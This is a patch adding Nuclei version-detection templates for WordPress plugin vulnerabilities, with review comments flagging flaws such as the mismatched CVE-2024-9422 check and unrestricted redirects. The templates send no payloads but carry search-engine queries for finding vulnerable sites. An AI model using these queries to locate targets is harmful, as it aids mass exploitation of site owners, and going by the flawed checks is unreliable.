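Review bot: `redirects: true` with `max-redirects: 3` in the CVE-2024-54255 template follows redirects to any host, so the readme.txt that the matchers evaluate may come from a different site than `{{BaseURL}}`, and the finding is then recorded against the wrong target. Restricting the request to the scanned host with `host-redirects: true` in place of `redirects: true` avoids that. The same two lines are in every template of this patch.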
@@ -0,0 +1,59 @@ +id: CVE-2024-54260-174ca9070168a4655d9261554d70d98e + +info: + name: > + News Kit Elementor Addons <= 1.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The News Kit Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/df96f58a-bc6e-47e7-a465-4aebdb264512?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54260 + metadata: + fofa-query: "wp-content/plugins/news-kit-elementor-addons/" + google-query: inurl:"/wp-content/plugins/news-kit-elementor-addons/" + shodan-query: 'vuln:CVE-2024-54260' + tags: cve,wordpress,wp-plugin,news-kit-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/news-kit-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "news-kit-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7982.yaml b/poc/cve/CVE-2024-7982.yaml new file mode 100644 index 0000000000..27b66bba0e --- /dev/null +++ b/poc/cve/CVE-2024-7982.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7982-fc7896dc545f4f6e317ed308a0e8b1e6 + +info: + name: > + Registrations for the Events Calendar – Event Registration Plugin <= 2.12.3 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The Registrations for the Events Calendar – Event Registration Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the first and last name parameters in all versions up to, and including, 2.12.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f05a55ba-8068-4f6e-a7b1-f3d5d17e54ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-7982 + metadata: + fofa-query: "wp-content/plugins/registrations-for-the-events-calendar/" + google-query: inurl:"/wp-content/plugins/registrations-for-the-events-calendar/" + shodan-query: 'vuln:CVE-2024-7982' + tags: cve,wordpress,wp-plugin,registrations-for-the-events-calendar,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/registrations-for-the-events-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "registrations-for-the-events-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.3') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8157.yaml b/poc/cve/CVE-2024-8157.yaml new file mode 100644 index 0000000000..1db2a2e5b4 --- /dev/null +++ b/poc/cve/CVE-2024-8157.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8157-6e2ff7bf6e39d3c1283ab25439378a24 + +info: + name: > + Alphabetical List <= 1.0.3 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The Alphabetical List plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the 'alphabetical-list' page. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2952a7bf-ccbf-46e0-ac7e-54576f413f66?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8157 + metadata: + fofa-query: "wp-content/plugins/alphabetical-list/" + google-query: inurl:"/wp-content/plugins/alphabetical-list/" + shodan-query: 'vuln:CVE-2024-8157' + tags: cve,wordpress,wp-plugin,alphabetical-list,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/alphabetical-list/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "alphabetical-list" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.3') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8378.yaml b/poc/cve/CVE-2024-8378.yaml new file mode 100644 index 0000000000..a88f69abdd --- /dev/null +++ b/poc/cve/CVE-2024-8378.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8378-74a7d87cee245c48a3bf9a30ec708ca3 + +info: + name: > + Safe SVG <= 2.2.5 - Authenticated (Author+) Stored Cross-Site Scripting via SVG + author: topscoder + severity: low + description: > + The Safe SVG plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.2.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5d42dc6-047f-45ff-9a7a-5a7738f7dcb5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-8378 + metadata: + fofa-query: "wp-content/plugins/safe-svg/" + google-query: inurl:"/wp-content/plugins/safe-svg/" + shodan-query: 'vuln:CVE-2024-8378' + tags: cve,wordpress,wp-plugin,safe-svg,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "safe-svg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8444.yaml b/poc/cve/CVE-2024-8444.yaml new file mode 100644 index 0000000000..06224e03ae --- /dev/null 
+++ b/poc/cve/CVE-2024-8444.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8444-6574252782a3a4b5b570683a6ba1f844 + +info: + name: > + Download Manager <= 3.2.99 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm_login_form' shortcode in all versions up to, and including, 3.2.99 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/df93727c-2d2f-4e13-8c89-3ffb93975180?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8444 + metadata: + fofa-query: "wp-content/plugins/download-manager/" + google-query: inurl:"/wp-content/plugins/download-manager/" + shodan-query: 'vuln:CVE-2024-8444' + tags: cve,wordpress,wp-plugin,download-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/download-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "download-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.99') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8625.yaml b/poc/cve/CVE-2024-8625.yaml new file mode 100644 index 0000000000..a0096554f7 --- /dev/null 
+++ b/poc/cve/CVE-2024-8625.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8625-d78c80da7bee3e0e6c7436c5df622773 + +info: + name: > + TS Poll – Survey, Versus Poll, Image Poll, Video Poll <= 2.3.9 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The TS Poll – Survey, Versus Poll, Image Poll, Video Poll plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d7b73f4-e52f-40bd-9865-de994cd8d610?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-8625 + metadata: + fofa-query: "wp-content/plugins/poll-wp/" + google-query: inurl:"/wp-content/plugins/poll-wp/" + shodan-query: 'vuln:CVE-2024-8625' + tags: cve,wordpress,wp-plugin,poll-wp,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/poll-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "poll-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.9') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml b/poc/cve/CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml new file mode 100644 index 0000000000..916ae210bf --- /dev/null +++ b/poc/cve/CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf + +info: + name: > + Product Designer <= 1.0.36 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.36 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/28126b4f-1cb6-4e91-b1c0-09f407d1dbf8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9111 + metadata: + fofa-query: "wp-content/plugins/product-designer/" + google-query: inurl:"/wp-content/plugins/product-designer/" + shodan-query: 'vuln:CVE-2024-9111' + tags: cve,wordpress,wp-plugin,product-designer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-designer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-designer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.36') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9290.yaml b/poc/cve/CVE-2024-9290.yaml new file mode 100644 index 0000000000..54696e69d9 --- /dev/null +++ b/poc/cve/CVE-2024-9290.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9290-5dcc80904918d747de269b21d040c79c + +info: + name: > + Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and a missing capability check on the ibk_restore_migrate_check() function in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9290 + metadata: + fofa-query: "wp-content/plugins/indeed-wp-superbackup/" + google-query: inurl:"/wp-content/plugins/indeed-wp-superbackup/" + shodan-query: 'vuln:CVE-2024-9290' + tags: cve,wordpress,wp-plugin,indeed-wp-superbackup,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-wp-superbackup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-wp-superbackup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9422.yaml b/poc/cve/CVE-2024-9422.yaml new file mode 100644 index 0000000000..e326b659dd --- /dev/null +++ b/poc/cve/CVE-2024-9422.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9422-36832b91d82ec54ad53a0608240202ac + +info: + name: > + GEO My WordPress <= 4.4.0.2 - Authenticated (Admin+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The GEO My WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in versions up to, and including 4.4.0.2 (or version up to 3.1 for premium). This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8214cdd-3a7d-40ce-9645-7dbd6e8f037f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-9422 + metadata: + fofa-query: "wp-content/plugins/gmw-premium-settings/" + google-query: inurl:"/wp-content/plugins/gmw-premium-settings/" + shodan-query: 'vuln:CVE-2024-9422' + tags: cve,wordpress,wp-plugin,gmw-premium-settings,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gmw-premium-settings/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gmw-premium-settings" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 3.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9428.yaml b/poc/cve/CVE-2024-9428.yaml new file mode 100644 index 0000000000..9989ee966f --- /dev/null +++ b/poc/cve/CVE-2024-9428.yaml 
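Review bot: The CVE-2024-9422 template is named `GEO My WordPress <= 4.4.0.2`, but the path, the word matcher and the search queries all use the slug `gmw-premium-settings`, and the comparison is `compare_versions(version, '< 3.1')`; as written it can only report the premium add-on and never the 4.4.0.2 range of the main plugin that the name and description give. The description says "version up to 3.1 for premium", which reads as inclusive, while `< 3.1` leaves 3.1 out; if 3.1 is affected the line should be `- compare_versions(version, '<= 3.1')`. The `name` should say which package is actually checked, and `severity: low` here sits next to `cvss-score: 7.2`.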
@@ -0,0 +1,59 @@ +id: CVE-2024-9428-c09d51632b50b1241638d75cbef69a48 + +info: + name: > + Popup Builder <= 4.3.4 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Popup Builder – Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e5a29d8-f40e-4711-aaae-1aa01ebd11fe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-9428 + metadata: + fofa-query: "wp-content/plugins/popup-builder/" + google-query: inurl:"/wp-content/plugins/popup-builder/" + shodan-query: 'vuln:CVE-2024-9428' + tags: cve,wordpress,wp-plugin,popup-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "popup-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.4') \ No newline at end of file 
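Review bot: The description of the CVE-2024-9428 template ends with "This only affects multi-site installations and installations where unfiltered_html has been disabled", but the matchers test only the readme version, so a default single-site install at or below 4.3.4 is reported although the stated precondition is not met. The same applies to CVE-2024-9651 and CVE-2024-9768 further down, and to CVE-2024-9608, whose description limits the issue to stores set to Belgium. Since the precondition cannot be read from readme.txt, I would mark these as unconfirmed in the template, e.g. a comment above `http:` such as `# precondition (multisite or unfiltered_html disabled) is not checked; confirm before reporting`.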
diff --git a/poc/cve/CVE-2024-9608.yaml b/poc/cve/CVE-2024-9608.yaml new file mode 100644 index 0000000000..a9cdb42026 --- /dev/null +++ b/poc/cve/CVE-2024-9608.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9608-43ae0e925e1e1d7237870fbf4dcc9527 + +info: + name: > + MyParcel <= 4.24.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The MyParcel plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.24.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Please note this is only exploitable when the WooCommerce store is set to Belgium. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6c85f2b-965d-477f-9d9a-4a3f315c4904?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9608 + metadata: + fofa-query: "wp-content/plugins/woocommerce-myparcel/" + google-query: inurl:"/wp-content/plugins/woocommerce-myparcel/" + shodan-query: 'vuln:CVE-2024-9608' + tags: cve,wordpress,wp-plugin,woocommerce-myparcel,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-myparcel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-myparcel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.24.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9651.yaml b/poc/cve/CVE-2024-9651.yaml new file mode 100644 index 0000000000..48fbb421e4 --- /dev/null +++ b/poc/cve/CVE-2024-9651.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9651-22705fcb7e0d7ad90586a2952ccaeadc + +info: + name: > + Fluent Forms <= 5.2.0 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ca329b94-1d4c-439c-b45a-6b39ccf3d1eb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-9651 + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:CVE-2024-9651' + tags: cve,wordpress,wp-plugin,fluentform,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml b/poc/cve/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml new file mode 100644 index 0000000000..645549d8ce --- /dev/null +++ b/poc/cve/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6 + +info: + name: > + Crafthemes Demo Import <= 3.3 - Authenticated (Admin+) Arbitrary File Upload in process_uploaded_files + author: topscoder + severity: low + description: > + The Crafthemes Demo Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'process_uploaded_files' function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e44dd0e8-e6e7-4a2d-b9ca-abd1de273092?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-9698 + metadata: + fofa-query: "wp-content/plugins/crafthemes-demo-import/" + google-query: inurl:"/wp-content/plugins/crafthemes-demo-import/" + shodan-query: 'vuln:CVE-2024-9698' + tags: cve,wordpress,wp-plugin,crafthemes-demo-import,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/crafthemes-demo-import/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "crafthemes-demo-import" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9768.yaml b/poc/cve/CVE-2024-9768.yaml new file mode 100644 index 0000000000..5db87f9b90 --- /dev/null +++ b/poc/cve/CVE-2024-9768.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9768-30f7e3c972d3515da9f5d833ce52d040 + +info: + name: > + Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder <= 6.14 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0f93f3c4-555c-4fb5-b4ad-b03cdba82fb8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-9768 + metadata: + fofa-query: "wp-content/plugins/formidable/" + google-query: inurl:"/wp-content/plugins/formidable/" + shodan-query: 'vuln:CVE-2024-9768' + tags: cve,wordpress,wp-plugin,formidable,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "formidable" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.14') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9828.yaml b/poc/cve/CVE-2024-9828.yaml new file mode 100644 index 0000000000..e2e6e4c7f6 --- /dev/null +++ b/poc/cve/CVE-2024-9828.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9828-b109b777c27d6b8c5c2052777f0757de + +info: + name: > + Taskbuilder – WordPress Project & Task Management plugin <= 3.0.4 - Authenticated (Admin+) SQL injection + author: topscoder + severity: low + description: > + The Taskbuilder – WordPress Project & Task Management plugin plugin for WordPress is vulnerable to SQL Injection via the 'load_orders' parameter in all versions up to, and including, 3.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c7aeef5-b87e-4cd0-9374-93b7f67a9187?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-9828 + metadata: + fofa-query: "wp-content/plugins/taskbuilder/" + google-query: inurl:"/wp-content/plugins/taskbuilder/" + shodan-query: 'vuln:CVE-2024-9828' + tags: cve,wordpress,wp-plugin,taskbuilder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/taskbuilder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "taskbuilder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9835.yaml b/poc/cve/CVE-2024-9835.yaml new file mode 100644 index 0000000000..4ea6f5a7d0 
